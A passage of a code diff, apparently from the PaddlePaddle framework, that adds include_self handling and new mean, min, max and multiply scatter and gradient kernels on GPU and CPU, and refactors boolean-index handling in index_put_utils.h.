+      <<<grid, block, 0, stream>>>(grad_data,
+                                   dim,
+                                   index_data,
+                                   select_dim_size,
+                                   grad_select_dim_size,
+                                   outer_dim_size,
+                                   outer_dim_size_grad,
+                                   index_size,
+                                   grad_size,
+                                   shared_mem);
 }
 
 template <typename tensor_t, typename index_t>
@@ -399,17 +880,11 @@ __global__ void ScatterValueGradGPUKernel(tensor_t* grad_data,
                                           int64_t outer_dim_size_self,
                                           int64_t outer_dim_size_grad,
                                           int64_t numel,
-                                          int64_t numel_data) {
+                                          int64_t numel_data,
+                                          int* thread_ids) {
   int tid = threadIdx.x + blockIdx.x * blockDim.x;
   if (tid >= numel) return;
-  extern __shared__ int thread_ids[];
 
-  if (tid == 0) {
-    for (int i = 0; i < numel_data; i++) {
-      thread_ids[i] = 0;
-    }
-  }
-  __syncthreads();
   int64_t i, j, k;
   i = tid / (select_dim_size * outer_dim_size);
   int64_t remind = tid % (select_dim_size * outer_dim_size);
@@ -418,7 +893,6 @@ __global__ void ScatterValueGradGPUKernel(tensor_t* grad_data,
   index_t index = index_data[tid];
   int64_t replace_index_self = k + index * outer_dim_size_self +
                                i * outer_dim_size_self * self_select_dim_size;
-
   atomicMax(thread_ids + replace_index_self, tid);
   __syncthreads();
 
@@ -433,6 +907,7 @@ void gpu_scatter_value_grad_kernel(phi::DenseTensor self,
                                    int dim,
                                    const phi::DenseTensor& index,
                                    phi::DenseTensor grad,
+                                   bool include_self UNUSED,
                                    const phi::DeviceContext& ctx) {
   auto* self_data = self.data<tensor_t>();
   auto* index_data = index.data<index_t>();
@@ -461,30 +936,362 @@ void gpu_scatter_value_grad_kernel(phi::DenseTensor self,
     outer_dim_size_grad *= grad_dims[i];
   }
 
+  DenseTensor shared_mem_tensor;
+  shared_mem_tensor.Resize({self_size});
+  ctx.Alloc<int>(&shared_mem_tensor);
+  phi::funcs::set_constant(ctx, &shared_mem_tensor, 0);
+  int* shared_mem = shared_mem_tensor.data<int>();
+
   int block = 512;
   int64_t n = inner_dim_size * select_dim_size * outer_dim_size;
   int64_t grid = (n + block - 1) / block;
   auto stream = reinterpret_cast<const phi::GPUContext&>(ctx).stream();
-  int shared_mem_size = sizeof(int) * self_size;
   ScatterValueGradGPUKernel<tensor_t, index_t>
-      <<<grid, block, shared_mem_size, stream>>>(grad_data,
-                                                 dim,
-                                                 self_data,
-                                                 index_data,
-                                                 select_dim_size,
-                                                 self_select_dim_size,
-                                                 grad_select_dim_size,
-                                                 outer_dim_size,
-                                                 outer_dim_size_self,
-                                                 outer_dim_size_grad,
-                                                 index_size,
-                                                 self_size);
+      <<<grid, block, 0, stream>>>(grad_data,
+                                   dim,
+                                   self_data,
+                                   index_data,
+                                   select_dim_size,
+                                   self_select_dim_size,
+                                   grad_select_dim_size,
+                                   outer_dim_size,
+                                   outer_dim_size_self,
+                                   outer_dim_size_grad,
+                                   index_size,
+                                   self_size,
+                                   shared_mem);
+}
+
+template <typename tensor_t, typename index_t>
+__global__ void ScatterMeanValueGradGPUKernel(tensor_t* grad_data,
+                                              int dim,
+                                              const tensor_t* self_data,
+                                              const index_t* index_data,
+                                              int select_dim_size,
+                                              int self_select_dim_size,
+                                              int grad_select_dim_size,
+                                              int64_t outer_dim_size,
+                                              int64_t outer_dim_size_self,
+                                              int64_t outer_dim_size_grad,
+                                              int64_t numel,
+                                              int64_t numel_self,
+                                              int* shared_mem) {
+  int tid = threadIdx.x + blockIdx.x * blockDim.x;
+  if (tid >= numel) return;
+
+  int64_t i, j, k;
+  i = tid / (select_dim_size * outer_dim_size);
+  int64_t remind = tid % (select_dim_size * outer_dim_size);
+  j = remind / outer_dim_size;
+  k = remind % outer_dim_size;
+  index_t index = index_data[tid];
+  int64_t replace_index_self = k + index * outer_dim_size_self +
+                               i * outer_dim_size_self * self_select_dim_size;
+
+  phi::CudaAtomicAdd(shared_mem + replace_index_self, 1);
+  __syncthreads();
+
+  int64_t replace_index_grad = k + j * outer_dim_size_grad +
+                               i * outer_dim_size_grad * grad_select_dim_size;
+  grad_data[replace_index_grad] =
+      self_data[replace_index_self] /
+      static_cast<tensor_t>(shared_mem[replace_index_self]);
+}
+
+template <typename tensor_t, typename index_t>
+__global__ void ScatterAddValueGradGPUKernel(tensor_t* grad_data,
+                                             int dim,
+                                             const tensor_t* self_data,
+                                             const index_t* index_data,
+                                             int select_dim_size,
+                                             int self_select_dim_size,
+                                             int grad_select_dim_size,
+                                             int64_t outer_dim_size,
+                                             int64_t outer_dim_size_self,
+                                             int64_t outer_dim_size_grad,
+                                             int64_t numel) {
+  int tid = threadIdx.x + blockIdx.x * blockDim.x;
+  if (tid >= numel) return;
+  int64_t i, j, k;
+  i = tid / (select_dim_size * outer_dim_size);
+  int64_t remind = tid % (select_dim_size * outer_dim_size);
+  j = remind / outer_dim_size;
+  k = remind % outer_dim_size;
+  index_t index = index_data[tid];
+  int64_t replace_index_self = k + index * outer_dim_size_self +
+                               i * outer_dim_size_self * self_select_dim_size;
+  int64_t replace_index_grad = k + j * outer_dim_size_grad +
+                               i * outer_dim_size_grad * grad_select_dim_size;
+  grad_data[replace_index_grad] = self_data[replace_index_self];
+}
+
+template <typename tensor_t, typename index_t>
+void gpu_scatter_add_mean_value_grad_kernel(
+    phi::DenseTensor self,
+    int dim,
+    const phi::DenseTensor& index,
+    const phi::DenseTensor& out UNUSED,
+    const phi::DenseTensor& x UNUSED,
+    const phi::DenseTensor& value UNUSED,
+    phi::DenseTensor grad,
+    const std::string& reduce,
+    bool include_self,
+    const phi::DeviceContext& ctx UNUSED) {
+  auto* self_data = self.data<tensor_t>();
+  auto* index_data = index.data<index_t>();
+  auto* grad_data = grad.data<tensor_t>();
+
+  auto index_dims = index.dims();
+  auto self_dims = self.dims();
+  auto grad_dims = grad.dims();
+
+  int64_t self_size = self.numel();
+  int64_t grad_size = grad.numel();
+  int64_t index_size = index.numel();
+
+  int64_t inner_dim_size = 1;
+  int64_t outer_dim_size = 1;
+  int64_t outer_dim_size_self = 1;
+  int64_t outer_dim_size_grad = 1;
+  int64_t select_dim_size = index_dims[dim];
+  int64_t self_select_dim_size = self_dims[dim];
+  int64_t grad_select_dim_size = grad_dims[dim];
+  for (int i = 0; i < dim; ++i) {
+    inner_dim_size *= index_dims[i];
+  }
+
+  for (int i = dim + 1; i < index_dims.size(); i++) {
+    outer_dim_size *= index_dims[i];
+    outer_dim_size_self *= self_dims[i];
+    outer_dim_size_grad *= grad_dims[i];
+  }
+  int block = 512;
+  int64_t n = inner_dim_size * select_dim_size * outer_dim_size;
+  int64_t grid = (n + block - 1) / block;
+  auto stream = reinterpret_cast<const phi::GPUContext&>(ctx).stream();
+  if (reduce == "mean") {
+    DenseTensor shared_mem_tensor;
+    shared_mem_tensor.Resize({self_size});
+    ctx.Alloc<int>(&shared_mem_tensor);
+    if (include_self) {
+      phi::funcs::set_constant(ctx, &shared_mem_tensor, 1);
+    } else {
+      phi::funcs::set_constant(ctx, &shared_mem_tensor, 0);
+    }
+    int* shared_mem = shared_mem_tensor.data<int>();
+    ScatterMeanValueGradGPUKernel<tensor_t, index_t>
+        <<<grid, block, 0, stream>>>(grad_data,
+                                     dim,
+                                     self_data,
+                                     index_data,
+                                     select_dim_size,
+                                     self_select_dim_size,
+                                     grad_select_dim_size,
+                                     outer_dim_size,
+                                     outer_dim_size_self,
+                                     outer_dim_size_grad,
+                                     index_size,
+                                     self_size,
+                                     shared_mem);
+  } else if (reduce == "add") {
+    ScatterAddValueGradGPUKernel<tensor_t, index_t>
+        <<<grid, block, 0, stream>>>(grad_data,
+                                     dim,
+                                     self_data,
+                                     index_data,
+                                     select_dim_size,
+                                     self_select_dim_size,
+                                     grad_select_dim_size,
+                                     outer_dim_size,
+                                     outer_dim_size_self,
+                                     outer_dim_size_grad,
+                                     index_size);
+  }
+}
+
+template <typename tensor_t, typename index_t>
+__global__ void ScatterMulValueGradGPUKernel(tensor_t* grad_data,
+                                             int dim,
+                                             const index_t* index_data,
+                                             const tensor_t* self_data,
+                                             const tensor_t* value_data,
+                                             const tensor_t* out_data,
+                                             int select_dim_size,
+                                             int self_select_dim_size,
+                                             int grad_select_dim_size,
+                                             int64_t outer_dim_size,
+                                             int64_t outer_dim_size_self,
+                                             int64_t outer_dim_size_grad,
+                                             int64_t numel) {
+  int tid = threadIdx.x + blockIdx.x * blockDim.x;
+  if (tid >= numel) return;
+  int64_t i, j, k;
+  i = tid / (select_dim_size * outer_dim_size);
+  int64_t remind = tid % (select_dim_size * outer_dim_size);
+  j = remind / outer_dim_size;
+  k = remind % outer_dim_size;
+  index_t index = index_data[tid];
+  int64_t replace_index_self = k + index * outer_dim_size_self +
+                               i * outer_dim_size_self * self_select_dim_size;
+  int64_t replace_index_grad = k + j * outer_dim_size_grad +
+                               i * outer_dim_size_grad * grad_select_dim_size;
+  grad_data[replace_index_grad] =
+      self_data[replace_index_self] *
+      (out_data[replace_index_self] / value_data[replace_index_grad]);
 }
-Instantiate_Template_Function(gpu_gather_kernel)
-    Instantiate_Template_Function(gpu_scatter_assign_kernel)
-        Instantiate_Template_Function(gpu_scatter_add_kernel)
-            Instantiate_Template_Function(gpu_scatter_mul_kernel)
-                Instantiate_Template_Function(gpu_scatter_input_grad_kernel)
-                    Instantiate_Template_Function(gpu_scatter_value_grad_kernel)
+
+template <typename tensor_t, typename index_t>
+__global__ void ScatterMinMaxValueGradGPUKernel(tensor_t* grad_data,
+                                                int dim,
+                                                const index_t* index_data,
+                                                const tensor_t* self_data,
+                                                const tensor_t* value_data,
+                                                const tensor_t* out_data,
+                                                const tensor_t* x_data,
+                                                int select_dim_size,
+                                                int self_select_dim_size,
+                                                int grad_select_dim_size,
+                                                int64_t outer_dim_size,
+                                                int64_t outer_dim_size_self,
+                                                int64_t outer_dim_size_grad,
+                                                int64_t numel,
+                                                int64_t numel_self,
+                                                bool include_self,
+                                                int* shared_mem) {
+  int tid = threadIdx.x + blockIdx.x * blockDim.x;
+  if (tid >= numel) return;
+  int64_t i, j, k;
+  i = tid / (select_dim_size * outer_dim_size);
+  int64_t remind = tid % (select_dim_size * outer_dim_size);
+  j = remind / outer_dim_size;
+  k = remind % outer_dim_size;
+  index_t index = index_data[tid];
+  int64_t replace_index_self = k + index * outer_dim_size_self +
+                               i * outer_dim_size_self * self_select_dim_size;
+  int64_t replace_index_grad = k + j * outer_dim_size_grad +
+                               i * outer_dim_size_grad * grad_select_dim_size;
+  if (tid == 0) {
+    for (int i = 0; i < numel_self; i++) {
+      if (include_self &&
+          x_data[replace_index_self] == out_data[replace_index_self])
+        shared_mem[i] = 1;
+      else
+        shared_mem[i] = 0;  // number of elements
+    }
+  }
+  __syncthreads();
+  grad_data[replace_index_grad] = 0;
+  if (value_data[replace_index_grad] == out_data[replace_index_self])
+    phi::CudaAtomicAdd(shared_mem + replace_index_self, 1);
+  __syncthreads();
+  if (value_data[replace_index_grad] == out_data[replace_index_self])
+    grad_data[replace_index_grad] =
+        self_data[replace_index_self] /
+        static_cast<tensor_t>(shared_mem[replace_index_self]);
+}
+
+template <typename tensor_t, typename index_t>
+void gpu_scatter_mul_min_max_value_grad_kernel(phi::DenseTensor self,
+                                               int dim,
+                                               const phi::DenseTensor& index,
+                                               const phi::DenseTensor& out,
+                                               const phi::DenseTensor& x,
+                                               const phi::DenseTensor& value,
+                                               phi::DenseTensor grad,
+                                               const std::string& reduce,
+                                               bool include_self,
+                                               const phi::DeviceContext& ctx) {
+  auto* self_data = self.data<tensor_t>();
+  auto* index_data = index.data<index_t>();
+  auto* grad_data = grad.data<tensor_t>();
+  auto* out_data = out.data<tensor_t>();
+  auto* x_data = x.data<tensor_t>();
+  auto* value_data = value.data<tensor_t>();
+
+  auto index_dims = index.dims();
+  auto self_dims = self.dims();
+  auto grad_dims = grad.dims();
+
+  int64_t self_size = self.numel();
+  int64_t index_size = index.numel();
+
+  int64_t inner_dim_size = 1;
+  int64_t outer_dim_size = 1;
+  int64_t outer_dim_size_self = 1;
+  int64_t outer_dim_size_grad = 1;
+  int64_t select_dim_size = index_dims[dim];
+  int64_t self_select_dim_size = self_dims[dim];
+  int64_t grad_select_dim_size = grad_dims[dim];
+  for (int i = 0; i < dim; ++i) {
+    inner_dim_size *= index_dims[i];
+  }
+
+  for (int i = dim + 1; i < index_dims.size(); i++) {
+    outer_dim_size *= index_dims[i];
+    outer_dim_size_self *= self_dims[i];
+    outer_dim_size_grad *= grad_dims[i];
+  }
+  int block = 512;
+  int64_t n = inner_dim_size * select_dim_size * outer_dim_size;
+  int64_t grid = (n + block - 1) / block;
+  auto stream = reinterpret_cast<const phi::GPUContext&>(ctx).stream();
+  if (reduce == "mul" || reduce == "multiply") {
+    ScatterMulValueGradGPUKernel<tensor_t, index_t>
+        <<<grid, block, 0, stream>>>(grad_data,
+                                     dim,
+                                     index_data,
+                                     self_data,
+                                     value_data,
+                                     out_data,
+                                     select_dim_size,
+                                     self_select_dim_size,
+                                     grad_select_dim_size,
+                                     outer_dim_size,
+                                     outer_dim_size_self,
+                                     outer_dim_size_grad,
+                                     index_size);
+  } else if (reduce == "amin" || reduce == "amax") {
+    DenseTensor shared_mem_tensor;
+    shared_mem_tensor.Resize({self_size});
+    ctx.Alloc<int>(&shared_mem_tensor);
+
+    int* shared_mem = shared_mem_tensor.data<int>();
+    ScatterMinMaxValueGradGPUKernel<tensor_t, index_t>
+        <<<grid, block, 0, stream>>>(grad_data,
+                                     dim,
+                                     index_data,
+                                     self_data,
+                                     value_data,
+                                     out_data,
+                                     x_data,
+                                     select_dim_size,
+                                     self_select_dim_size,
+                                     grad_select_dim_size,
+                                     outer_dim_size,
+                                     outer_dim_size_self,
+                                     outer_dim_size_grad,
+                                     index_size,
+                                     self_size,
+                                     include_self,
+                                     shared_mem);
+  }
+}
+
+Instantiate_Template_Function(gpu_gather_kernel)                  // NOLINT
+    Instantiate_Template_Function(gpu_scatter_assign_kernel)      // NOLINT
+    Instantiate_Template_Function(gpu_scatter_add_kernel)         // NOLINT
+    Instantiate_Template_Function(gpu_scatter_mul_kernel)         // NOLINT
+    Instantiate_Template_Function(gpu_scatter_min_kernel)         // NOLINT
+    Instantiate_Template_Function(gpu_scatter_max_kernel)         // NOLINT
+    Instantiate_Template_Function(gpu_scatter_mean_kernel)        // NOLINT
+    Instantiate_Template_Function(gpu_scatter_input_grad_kernel)  // NOLINT
+    Instantiate_Template_Function(gpu_scatter_value_grad_kernel)  // NOLINT
+    Instantiate_Template_Function_With_Out(
+        gpu_scatter_mul_min_max_input_grad_kernel)                     // NOLINT
+    Instantiate_Template_Function(gpu_scatter_mean_input_grad_kernel)  // NOLINT
+    Instantiate_Template_Function_With_Out(
+        gpu_scatter_add_mean_value_grad_kernel)  // NOLINT
+    Instantiate_Template_Function_With_Out(
+        gpu_scatter_mul_min_max_value_grad_kernel)  // NOLINT
 }  // namespace funcs
 }  // namespace phi
diff --git a/paddle/phi/kernels/funcs/gather_scatter_functor.h b/paddle/phi/kernels/funcs/gather_scatter_functor.h
index 054ccc196fcd00..9fc50c44a79ead 100644
--- a/paddle/phi/kernels/funcs/gather_scatter_functor.h
+++ b/paddle/phi/kernels/funcs/gather_scatter_functor.h
@@ -36,11 +36,46 @@ namespace funcs {
                                     int dim,                           \
                                     const phi::DenseTensor& index,     \
                                     phi::DenseTensor result,           \
+                                    bool include_self,                 \
                                     const phi::DeviceContext& ctx);    \
   template void func<tensor_t, int64_t>(phi::DenseTensor input,        \
                                         int dim,                       \
                                         const phi::DenseTensor& index, \
                                         phi::DenseTensor result,       \
+                                        bool include_self,             \
+                                        const phi::DeviceContext& ctx);
+
+#define Instantiate_Template_Function_With_Out(func)                        \
+  Instantiate_Template_Function_index_t_With_Out(func, int)                 \
+      Instantiate_Template_Function_index_t_With_Out(func, float)           \
+          Instantiate_Template_Function_index_t_With_Out(func, double)      \
+              Instantiate_Template_Function_index_t_With_Out(func, int64_t) \
+                  Instantiate_Template_Function_index_t_With_Out(           \
+                      func, phi::dtype::float16)                            \
+                      Instantiate_Template_Function_index_t_With_Out(       \
+                          func, phi::dtype::bfloat16)                       \
+                          Instantiate_Template_Function_index_t_With_Out(   \
+                              func, unsigned char)
+#define Instantiate_Template_Function_index_t_With_Out(func, tensor_t) \
+  template void func<tensor_t, int>(phi::DenseTensor input,            \
+                                    int dim,                           \
+                                    const phi::DenseTensor& index,     \
+                                    const phi::DenseTensor& out,       \
+                                    const phi::DenseTensor& self,      \
+                                    const phi::DenseTensor& value,     \
+                                    phi::DenseTensor result,           \
+                                    const std::string& reduce,         \
+                                    bool include_self,                 \
+                                    const phi::DeviceContext& ctx);    \
+  template void func<tensor_t, int64_t>(phi::DenseTensor input,        \
+                                        int dim,                       \
+                                        const phi::DenseTensor& index, \
+                                        const phi::DenseTensor& out,   \
+                                        const phi::DenseTensor& self,  \
+                                        const phi::DenseTensor& value, \
+                                        phi::DenseTensor result,       \
+                                        const std::string& reduce,     \
+                                        bool include_self,             \
                                         const phi::DeviceContext& ctx);
 
 template <typename tensor_t, typename index_t>
@@ -48,6 +83,7 @@ void cpu_gather_kernel(phi::DenseTensor self,
                        int dim,
                        const phi::DenseTensor& index,
                        phi::DenseTensor result,
+                       bool include_self,
                        const phi::DeviceContext& ctx);
 
 template <typename tensor_t, typename index_t>
@@ -55,6 +91,7 @@ void cpu_scatter_assign_kernel(phi::DenseTensor self,
                                int dim,
                                const phi::DenseTensor& index,
                                phi::DenseTensor src,
+                               bool include_self,
                                const phi::DeviceContext& ctx);
 
 template <typename tensor_t, typename index_t>
@@ -62,6 +99,7 @@ void cpu_scatter_add_kernel(phi::DenseTensor self,
                             int dim,
                             const phi::DenseTensor& index,
                             phi::DenseTensor src,
+                            bool include_self,
                             const phi::DeviceContext& ctx);
 
 template <typename tensor_t, typename index_t>
@@ -69,6 +107,31 @@ void cpu_scatter_mul_kernel(phi::DenseTensor self,
                             int dim,
                             const phi::DenseTensor& index,
                             phi::DenseTensor src,
+                            bool include_self,
+                            const phi::DeviceContext& ctx);
+
+template <typename tensor_t, typename index_t>
+void cpu_scatter_mean_kernel(phi::DenseTensor self,
+                             int dim,
+                             const phi::DenseTensor& index,
+                             phi::DenseTensor src,
+                             bool include_self,
+                             const phi::DeviceContext& ctx);
+
+template <typename tensor_t, typename index_t>
+void cpu_scatter_max_kernel(phi::DenseTensor self,
+                            int dim,
+                            const phi::DenseTensor& index,
+                            phi::DenseTensor src,
+                            bool include_self,
+                            const phi::DeviceContext& ctx);
+
+template <typename tensor_t, typename index_t>
+void cpu_scatter_min_kernel(phi::DenseTensor self,
+                            int dim,
+                            const phi::DenseTensor& index,
+                            phi::DenseTensor src,
+                            bool include_self,
                             const phi::DeviceContext& ctx);
 
 template <typename tensor_t, typename index_t>
@@ -76,20 +139,67 @@ void cpu_scatter_input_grad_kernel(phi::DenseTensor self,
                                    int dim,
                                    const phi::DenseTensor& index,
                                    phi::DenseTensor grad,
+                                   bool include_self,
                                    const phi::DeviceContext& ctx);
 
+template <typename tensor_t, typename index_t>
+void cpu_scatter_mul_min_max_input_grad_kernel(phi::DenseTensor self,
+                                               int dim,
+                                               const phi::DenseTensor& index,
+                                               const phi::DenseTensor& out,
+                                               const phi::DenseTensor& x,
+                                               const phi::DenseTensor& value,
+                                               phi::DenseTensor grad,
+                                               const std::string& reduce,
+                                               bool include_self,
+                                               const phi::DeviceContext& ctx);
+
+template <typename tensor_t, typename index_t>
+void cpu_scatter_mean_input_grad_kernel(phi::DenseTensor self,
+                                        int dim,
+                                        const phi::DenseTensor& index,
+                                        phi::DenseTensor grad,
+                                        bool include_self,
+                                        const phi::DeviceContext& ctx);
+
 template <typename tensor_t, typename index_t>
 void cpu_scatter_value_grad_kernel(phi::DenseTensor self,
                                    int dim,
                                    const phi::DenseTensor& index,
                                    phi::DenseTensor grad,
+                                   bool include_self,
                                    const phi::DeviceContext& ctx);
 
+template <typename tensor_t, typename index_t>
+void cpu_scatter_add_mean_value_grad_kernel(phi::DenseTensor self,
+                                            int dim,
+                                            const phi::DenseTensor& index,
+                                            const phi::DenseTensor& out,
+                                            const phi::DenseTensor& x,
+                                            const phi::DenseTensor& value,
+                                            phi::DenseTensor grad,
+                                            const std::string& reduce,
+                                            bool include_self,
+                                            const phi::DeviceContext& ctx);
+
+template <typename tensor_t, typename index_t>
+void cpu_scatter_mul_min_max_value_grad_kernel(phi::DenseTensor self,
+                                               int dim,
+                                               const phi::DenseTensor& index,
+                                               const phi::DenseTensor& out,
+                                               const phi::DenseTensor& x,
+                                               const phi::DenseTensor& value,
+                                               phi::DenseTensor grad,
+                                               const std::string& reduce,
+                                               bool include_self,
+                                               const phi::DeviceContext& ctx);
+
 template <typename tensor_t, typename index_t>
 void gpu_gather_kernel(phi::DenseTensor self,
                        int dim,
                        const phi::DenseTensor& index,
                        phi::DenseTensor result,
+                       bool include_self,
                        const phi::DeviceContext& ctx);
 
 template <typename tensor_t, typename index_t>
@@ -97,6 +207,7 @@ void gpu_scatter_assign_kernel(phi::DenseTensor self,
                                int dim,
                                const phi::DenseTensor& index,
                                phi::DenseTensor src,
+                               bool include_self,
                                const phi::DeviceContext& ctx);
 
 template <typename tensor_t, typename index_t>
@@ -104,6 +215,7 @@ void gpu_scatter_add_kernel(phi::DenseTensor self,
                             int dim,
                             const phi::DenseTensor& index,
                             phi::DenseTensor src,
+                            bool include_self,
                             const phi::DeviceContext& ctx);
 
 template <typename tensor_t, typename index_t>
@@ -111,6 +223,31 @@ void gpu_scatter_mul_kernel(phi::DenseTensor self,
                             int dim,
                             const phi::DenseTensor& index,
                             phi::DenseTensor src,
+                            bool include_self,
+                            const phi::DeviceContext& ctx);
+
+template <typename tensor_t, typename index_t>
+void gpu_scatter_mean_kernel(phi::DenseTensor self,
+                             int dim,
+                             const phi::DenseTensor& index,
+                             phi::DenseTensor src,
+                             bool include_self,
+                             const phi::DeviceContext& ctx);
+
+template <typename tensor_t, typename index_t>
+void gpu_scatter_max_kernel(phi::DenseTensor self,
+                            int dim,
+                            const phi::DenseTensor& index,
+                            phi::DenseTensor src,
+                            bool include_self,
+                            const phi::DeviceContext& ctx);
+
+template <typename tensor_t, typename index_t>
+void gpu_scatter_min_kernel(phi::DenseTensor self,
+                            int dim,
+                            const phi::DenseTensor& index,
+                            phi::DenseTensor src,
+                            bool include_self,
                             const phi::DeviceContext& ctx);
 
 template <typename tensor_t, typename index_t>
@@ -118,14 +255,60 @@ void gpu_scatter_input_grad_kernel(phi::DenseTensor self,
                                    int dim,
                                    const phi::DenseTensor& index,
                                    phi::DenseTensor grad,
+                                   bool include_self,
                                    const phi::DeviceContext& ctx);
 
+template <typename tensor_t, typename index_t>
+void gpu_scatter_mul_min_max_input_grad_kernel(phi::DenseTensor self UNUSED,
+                                               int dim,
+                                               const phi::DenseTensor& index,
+                                               const phi::DenseTensor& out,
+                                               const phi::DenseTensor& x,
+                                               const phi::DenseTensor& value,
+                                               phi::DenseTensor grad,
+                                               const std::string& reduce,
+                                               bool include_self,
+                                               const phi::DeviceContext& ctx);
+
+template <typename tensor_t, typename index_t>
+void gpu_scatter_mean_input_grad_kernel(phi::DenseTensor self,
+                                        int dim,
+                                        const phi::DenseTensor& index,
+                                        phi::DenseTensor grad,
+                                        bool include_self,
+                                        const phi::DeviceContext& ctx);
+
 template <typename tensor_t, typename index_t>
 void gpu_scatter_value_grad_kernel(phi::DenseTensor self,
                                    int dim,
                                    const phi::DenseTensor& index,
                                    phi::DenseTensor grad,
+                                   bool include_self,
                                    const phi::DeviceContext& ctx);
 
+template <typename tensor_t, typename index_t>
+void gpu_scatter_add_mean_value_grad_kernel(phi::DenseTensor self,
+                                            int dim,
+                                            const phi::DenseTensor& index,
+                                            const phi::DenseTensor& out,
+                                            const phi::DenseTensor& x,
+                                            const phi::DenseTensor& value,
+                                            phi::DenseTensor grad,
+                                            const std::string& reduce,
+                                            bool include_self,
+                                            const phi::DeviceContext& ctx);
+
+template <typename tensor_t, typename index_t>
+void gpu_scatter_mul_min_max_value_grad_kernel(phi::DenseTensor self,
+                                               int dim,
+                                               const phi::DenseTensor& index,
+                                               const phi::DenseTensor& out,
+                                               const phi::DenseTensor& x,
+                                               const phi::DenseTensor& value,
+                                               phi::DenseTensor grad,
+                                               const std::string& reduce,
+                                               bool include_self,
+                                               const phi::DeviceContext& ctx);
+
 }  // namespace funcs
 }  // namespace phi
diff --git a/paddle/phi/kernels/funcs/index_put_utils.h b/paddle/phi/kernels/funcs/index_put_utils.h
index c81f716d0658b3..85aabb2adf3cd2 100644
--- a/paddle/phi/kernels/funcs/index_put_utils.h
+++ b/paddle/phi/kernels/funcs/index_put_utils.h
@@ -76,67 +76,73 @@ std::vector<const phi::DenseTensor*> DealWithBoolIndices(
     const Context& dev_ctx,
     const std::vector<const phi::DenseTensor*>& indices_v,
     std::vector<phi::DenseTensor>* tmp_indices_v) {
-  std::vector<const phi::DenseTensor*> res(indices_v.begin(), indices_v.end());
-  bool contains_bool_tensor = false;
+  std::vector<const phi::DenseTensor*> res;
 
+  bool contains_bool_tensor = false;
   for (size_t i = 0; i < indices_v.size(); ++i) {
     if (indices_v[i]->dtype() == phi::DataType::BOOL) {
       contains_bool_tensor = true;
-      int rank = indices_v[i]->dims().size();
-      PADDLE_ENFORCE_GE(
-          rank,
-          1UL,
-          phi::errors::InvalidArgument("the only bool tensor in indices should "
-                                       "have number of dimension at least 1"));
-      phi::DenseTensor nonzero_indices(phi::DataType::INT64);
-      nonzero_indices.Resize(common::make_ddim({-1, rank}));
-      NonZeroKernel<bool, Context>(dev_ctx, *indices_v[i], &nonzero_indices);
-
-      if (nonzero_indices.numel() == 0) {
-        std::vector<const phi::DenseTensor*> empty_indices;
-        return empty_indices;
-      }
+      break;
+    }
+  }
 
-      std::vector<phi::DenseTensor*> integer_indices(rank, nullptr);
-      const int tmp_ix = tmp_indices_v->size();
-      for (int i = 0; i < rank; ++i) {
-        tmp_indices_v->emplace_back(
-            DenseTensor(phi::DataType::INT64)
-                .Resize(common::make_ddim({nonzero_indices.dims()[0]})));
-      }
-      for (int i = 0; i < rank; ++i) {
-        integer_indices[i] = &((*tmp_indices_v)[i + tmp_ix]);
-      }
-      SplitWithNumKernel<int64_t, Context>(
-          dev_ctx, nonzero_indices, rank, 1, integer_indices);
+  if (contains_bool_tensor) {
+    for (size_t i = 0; i < indices_v.size(); ++i) {
+      if (indices_v[i]->dtype() == phi::DataType::BOOL) {
+        int rank = indices_v[i]->dims().size();
+        PADDLE_ENFORCE_GE(rank,
+                          1UL,
+                          phi::errors::InvalidArgument(
+                              "the only bool tensor in indices should "
+                              "have number of dimension at least 1"));
+        phi::DenseTensor nonzero_indices(phi::DataType::INT64);
+        nonzero_indices.Resize(common::make_ddim({-1, rank}));
+        NonZeroKernel<bool, Context>(dev_ctx, *indices_v[i], &nonzero_indices);
+
+        if (nonzero_indices.numel() == 0) {
+          std::vector<const phi::DenseTensor*> empty_indices;
+          return empty_indices;
+        }
+
+        std::vector<phi::DenseTensor*> integer_indices(rank, nullptr);
+        const int tmp_ix = tmp_indices_v->size();
+        for (int i = 0; i < rank; ++i) {
+          tmp_indices_v->emplace_back(
+              DenseTensor(phi::DataType::INT64)
+                  .Resize(common::make_ddim({nonzero_indices.dims()[0]})));
+        }
+        for (int i = 0; i < rank; ++i) {
+          integer_indices[i] = &((*tmp_indices_v)[i + tmp_ix]);
+        }
+        SplitWithNumKernel<int64_t, Context>(
+            dev_ctx, nonzero_indices, rank, 1, integer_indices);
 #ifdef PADDLE_WITH_XPU
-      auto place = dev_ctx.GetPlace();
-      if (place.GetType() == phi::AllocationType::XPU) {
-        auto& pool = phi::DeviceContextPool::Instance();
-        auto* xpu_ctx = static_cast<phi::XPUContext*>(pool.Get(place));
-        if (xpu_ctx->x_context()->xpu_stream) {
-          dev_ctx.Wait();
+        auto place = dev_ctx.GetPlace();
+        if (place.GetType() == phi::AllocationType::XPU) {
+          auto& pool = phi::DeviceContextPool::Instance();
+          auto* xpu_ctx = static_cast<phi::XPUContext*>(pool.Get(place));
+          if (xpu_ctx->x_context()->xpu_stream) {
+            dev_ctx.Wait();
+          }
         }
-      }
 #endif
 
-    } else if ((indices_v[i]->dtype() == phi::DataType::INT64) ||
-               (indices_v[i]->dtype() == phi::DataType::INT32)) {
-      tmp_indices_v->emplace_back(*indices_v[i]);
-    } else {
-      PADDLE_THROW(phi::errors::InvalidArgument(
-          "data type of tensor in indices must be int32, int64 or bool"));
+      } else if ((indices_v[i]->dtype() == phi::DataType::INT64) ||
+                 (indices_v[i]->dtype() == phi::DataType::INT32)) {
+        tmp_indices_v->emplace_back(*indices_v[i]);
+      } else {
+        PADDLE_THROW(phi::errors::InvalidArgument(
+            "data type of tensor in indices must be int32, int64 or bool"));
+      }
     }
-  }
-  if (contains_bool_tensor) {
-    std::vector<const phi::DenseTensor*> res_tmp(tmp_indices_v->size(),
-                                                 nullptr);
-    for (size_t i = 0; i < res_tmp.size(); ++i) {
-      res_tmp[i] = &((*tmp_indices_v)[i]);
+
+    res.reserve(tmp_indices_v->size());
+    for (size_t i = 0; i < tmp_indices_v->size(); ++i) {
+      res.emplace_back(&((*tmp_indices_v)[i]));
     }
-    res.swap(res_tmp);
+  } else {
+    res = indices_v;
   }
-
   return res;
 }
 
@@ -215,62 +221,50 @@ void DealWithIndices(const Context& dev_ctx,
     res_dim_v->insert(res_dim_v->end(),
                       tmp_x_dims.begin() + int_indices_v.size(),
                       tmp_x_dims.end());
-
-    std::vector<DenseTensor> reshaped_indices_v;
+    phi::DDim res_dim = common::make_ddim(*res_dim_v);
     for (size_t i = 0; i < int_indices_v.size(); ++i) {
+      phi::DenseTensor index_tensor;
       if (int_indices_v[i]->dtype() == phi::DataType::INT32) {
